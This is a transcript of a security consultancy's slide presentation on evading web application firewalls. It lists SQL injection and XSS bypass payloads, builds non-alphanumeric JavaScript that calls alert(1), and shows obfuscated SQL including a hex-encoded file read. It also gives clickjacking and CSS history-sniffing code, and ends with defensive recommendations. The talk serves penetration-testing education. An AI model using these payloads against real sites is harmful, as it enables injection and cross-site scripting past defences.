Bypassing Waf
39
www.nethemba.com www.nethemba.com Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant
-
Upload
lukas-luke-geyer -
Category
Documents
-
view
87 -
download
4
description
interesting
Transcript of Bypassing Waf
www.nethemba.com www.nethemba.com
Bypassing Web Application Firewalls (WAFs)
Ing. Pavol Lupták, CISSP, CEHLead Security Consultant
www.nethemba.com
Nethemba – All About Security Highly experienced certified IT security experts (CISSP, C|EH, SCSecA)
Core business: All kinds of penetration tests, comprehensive web application security audits, local system and wifi security audits, security consulting, forensic analysis, secure VoIP, ultrasecure systems
OWASP activists: Leaders of Slovak/Czech OWASP chapters, coauthors of the most recognized OWASP Testing Guide v3.0, working on new version
We are the only one in Slovakia/Czech Republic that offer:
Penetration tests and security audits of SAP
Security audit of smart RFID cards
Unique own and sponsored security research in many areas (see our references – Vulnerabilities in public transport SMS tickets, cracked the most used Mifare Classic RFID cards)
www.nethemba.com
What are WAFs? Emerged from IDS/IPS focused on HTTP
protocol and HTTP related attacks Usually contain a lot of complex regexp rules
to match Support special features like cookie encryption,
CSRF protection, etc. Except of free mod_security they are quite
expensive (and often there is no correlation between the price and their filtering capabilities)
www.nethemba.com
WAFs implementations Usually they are deployed in “blacklisting mode”
that is more vulnerable to bypasses and targeted attacks
Application “context” (type of allowed inputs) is necessary to know for deploying of more secure “whitelisting mode”
All WAFs can by bypassed WAF is just a workaround, but from the security
point of view it can be costeffective
www.nethemba.com
WAF filter rules Directly reflects WAF effectiveness For most WAF vendors they are closely
guarded secrets – most determined attackers are able to bypass them without seeing the actual rules
Opensource WAFs (mod_security, PHPIDS) have open source rules which is better for more scrutiny by skilled penetration testers
www.nethemba.com
Typical WAF bypassesBlocked Attack Undetected modification
'or 1=1-- ' or 2=2--
alert(0) %00alert(0)
<script>alert(0)</script> <script type=vbscript>MsgBox(0)</script>
' or ''''='r '/**/OR/**/''''='
<script>alert(0)</script> <img src=”x:x” onerror=”alert(0)”></img>
<img src=x:x onerror=alert(0)//></img> <img src=http://url onload=alert(0)//></img>
1 or 1=1 (1)or(1)=(1)
eval(name) x=this.nameX(0?$:name+1)
www.nethemba.com
Yes, WAF may be also be vulnerable! WAF also increases the attack surface of a
target organization WAF may be the target of and vulnerable to
malicious attacks, e.g. XSS, SQL injection, denialofservice attacks, remote code execution vulnerabilities
These vulnerabilities have been found in all types of WAF products(!)
www.nethemba.com
Typical bypass flow
1. Find out which characters / sequences are allowed by WAFs
2. Make an obfuscated version of your injected payload
3. Test it and watch for the WAF/application response
4. If it does not work, modify it and try step 2.
www.nethemba.com
Javascript obfuscation Javascript has very powerful features Javascript payload is used in XSS attacks It is full of evals, expression closures, generator
expressions, iterators, special characters and shortcuts
Supports a lot of encodings (unicode – multibyte characters, hexadecimal, octal, combination of all of them)
Supports XOR, “Encryption”, Base64
www.nethemba.com
Nonalphanumeric javascript code Even if only few characters are allowed it is
possible to construct fully functional code: _=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;
$$=({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")[$]+(($==$)+"")[_]+(($==$)++"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}+"")[_]+(($==$)+"")[_];$$$=(($!=$)+"")+[_]+(($!=$)+"")[__]+(($==$)+"")[___]+(($==$)+"")[_]+(($==$)+"")[$];$_$=({}+"")[+_____]+({}+"")[_]+({}+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[__]+(($==$)+"")[___]; ($)[$$][$$]($$$+"('"+$_$+"')")()
([,Á,È,ª,É,,Ó]=!{}+{},[[Ç,µ]=!!Á+Á][ª+Ó+µ+Ç])()[Á+È+É+µ+Ç](~Á)
www.nethemba.com
Let's bypass WAF! Example situation: WAF blocks alpha
characters and numbers (probably not a very real situation, just proofofconcept :)
Allows only few special characters (){}_=[];$”!+<>
Let's generate fully nonalphanumeric javascript code!
www.nethemba.com
Possibilities of Javascript language We can use numbers to obtain a single character in a string, e.g. index zero for accessing the first character “abc”[0] We can use addition (+), subtraction (), multiplication (*), division (/), modulus (%), increment (++), decrement () We know that mathematical operators perform automatic numeric conversion and string operators perform automatic string conversion
www.nethemba.com
Source of different alphanumeric characters in Javascript
Javascript object / error state
String result
{}+'' “[object Object]”
+[][+[]] “NaN”
[][+[]]+[] “undefined”
[![]]+[] “false”
[!![]]+[] “true”
www.nethemba.com
Shortest Possible Ways to Create Zero without Using Numbers
Characters Result
+[] 0
+`'` 0
+”`” 0
-[] 0
-`'` 0
-”`” 0
www.nethemba.com
Generating numbers +[] //0 ++[[]][+[]] //1 +!+[] //1 ++[++[[]][+[]]][+[]] //2 !+[]+!+[] //2 ++[++[++[[]][+[]]][+[]]][+[]] //3 !+[]+!+[]+!+[] //3
www.nethemba.com
Gain alpha characters without directly using them
When define Javascript object using the object literal and concatenate with string, the result is [object Object]
_={}+''; //[object Object]
alert(_[1]) //returns 'o' character
www.nethemba.com
Generate string “alert” without using any alphanumeric characters
Let's start with 'a' What Javascript object contains 'a'? We can use 'NaN' (Not a Number) Access empty string with index “0” (undefined)
and convert to number (NaN) +[][+[]] // result: NaN
www.nethemba.com
Generating 'a' character NaN[1]='a'
++[[]][+[]] //1
+[][+[]]+[] // result string: NaN
(+[][+[]]+[])[++[[]][+[]]] //a
We have character 'a'
www.nethemba.com
Generating 'l' character Use boolean false We can use ! (NOT) operator e.g. ''==0 //true Use blank array (string) and then NOT operator
to obtain boolean, wrap with [] and convert it to string
([![]]+[]) //string “false”
www.nethemba.com
Generating 'l' character ++[++[[]][+[]]][+[]] //2
([![]]+[]) //string “false”
'false'[2] = ([![]]+[])[++[++[[]][+[]]][+[]]] // 'l'
We have 'l' character!
www.nethemba.com
Generating 'e' character It's easy, we can use boolean true ([!![]]+[]) // string 'true'
++[++[++[[]][+[]]][+[]]][+[]] //3
'true'[3] = ([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] //e
And we have 'e' character!
www.nethemba.com
Generating 'r' character It's easy, we can use boolean true ([!![]]+[]) // string 'true'
++[[]][+[]] //1
'true'[1] = ([!![]]+[])[++[[]][+[]]] //r
And we have 'r' character!
www.nethemba.com
Generating 't' character It's easy, we can use boolean true ([!![]]+[]) // string 'true'
+[] //0
'true'[0] = ([!![]]+[])[+[]] //t
And we have 't' character!
www.nethemba.com
And now we have 'alert' string!(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]] //string 'alert'
www.nethemba.com
How to execute the code of our choice? It is necessary to return window object to
access all properties of window If you can access to a constructor, you can
access Function constructor to execute arbitrary code
The shortest possible way to get window is:
alert((1,[].sort)()) // shows window object !
Works in all browsers except IE
www.nethemba.com
How to generate 'sort' string We know how to generate string 'alert' We need to generate 'sort' string
'false'[3]=([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] //'s'
We can gain 'o' from []+{} [object Object]
([]+{})[++[[]][+[]]] //o
We have already generated 'r' and 't'
www.nethemba.com
And now we have 'sort' string([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]] //string 'sort'
www.nethemba.com
Let's build it together – call alert(1) (1,[].sort)().alert(1)
After changing number 1 and all alpha characters to their obfuscated version we get:
([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]])()[ (+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]] +([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++ [[]][+[]]]+([!![]]+[])[+[]]](++[[]][+[]])
//calls alert(1)!
www.nethemba.com
How to call any arbitrary Javascript function
Using the array constructor (accessing the constructor twice from an array object returns Function):[].constructor.constructor(“alert(1)”)()
We need to generate the rest 'c','n','u' letters, gain them from the output of [].sort function:
function sort() { [native code] }
www.nethemba.com
SQL obfuscation What is obfuscation of SQL injection vector? Different DBMS have different SQL syntax,
most of them support Unicode, Base64, hex, octal and binary representation, escaping, hashing algorithms (MD5, SHA1)
Many “blacklisted” characters can be replaced by their functional alternatives (0xA0 in MySQL)
Obfuscated comments – it is difficult to determine what is a comment and what is not
www.nethemba.com
SQL obfuscation examples SELECT CONCAT (char
(x'70617373',b'1110111011011110111001001100100'))
s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1 SELECT
LOAD_FILE(0x633A5C626F6F742E696E69) (M)
SELECT(extractvalue(0x3C613E61646D696E3C2F613, 0x2F61))
www.nethemba.com
New SQL features MySQL/PostgreSQL supports XML functions:
SELECT UpdateXML('<script x=_></script>','/script/@x','src=//0x.lv');
HTML5 supports local DB storage (SQLite 3.1+) (openDatabase object) – can be misused for persistent XSS, local SQL injection attacks
www.nethemba.com
Existing obfuscation tools Hackvertor http://hackvertor.co.uk/public HackBar
https://addons.mozilla.org/enUS/firefox/addon/hackbar/ Malzilla http://malzilla.sourceforge.net/ Your imagination :)
www.nethemba.com
Summary WAFs are just workarounds!
The best solution is to care about security in every SDLC phase and strictly validate all inputs and outputs in the application
Use whitelisting instead of blacklisting (both in the application and WAF!)
Use multilayer security 3rdlayer database architecture or database firewalls
for SQL use “prepared” statements
for HTML use HTML Purifier or OWASP AntiSamy project
www.nethemba.com
References Web Application Obfuscation
http://www.amazon.com/WebApplicationObfuscationWAFsEvasionFiltersalert/dp/1597496049 XSS Attacks: Cross Site Scripting Exploits and
Defense http://www.amazon.com/XSSAttacksScriptingExploitsDefense/dp/1597491543/ref=sr_1_6?ie=UTF8&s=books&qid=1297627960&sr=86
Special thanks to Mario Heiderich and Stefano Di Paola
www.nethemba.com
UI redressing attacks clickjacking<style>iframe { filter: alpha(opacity=0); opacity: 0;
position: absolute; top: 0px; left 0px;
height: 300px; width: 250px; }
img { position: absolute; top: 0px; left: 0px;
height: 300px; width: 250px; }
</style>
<img src=”WHAT THE USERS SEES”/>
<iframe src=”WHAT THE USER IS ACTUALLY INTERACTING WITH”></iframe>
www.nethemba.com
Clickjacking protection Blocks using XFRAME/OPTIONS: NEVER <body>
<script>
if (top!=self) document.write('<plaintext>');
</script>
...
www.nethemba.com
CSS History attack<style>
a { position: relative; }
a:visited { position: absolute; }
</style>
<a id=”v” href=”http://www.google.com/”>Google</a>
<script>
var l=document.getElementById(“v”);
var c=getComputedStyle(l).position;
c==”absolute”?alert(“visited”):alert(“not visited”);
</script>
www.nethemba.com
CSS History exploitation methods Social network deanonymization attacks Session ID/CSRF token local brute force attack LAN scanners Fixed in Firefox 4.0, current browsers are
vulnerable
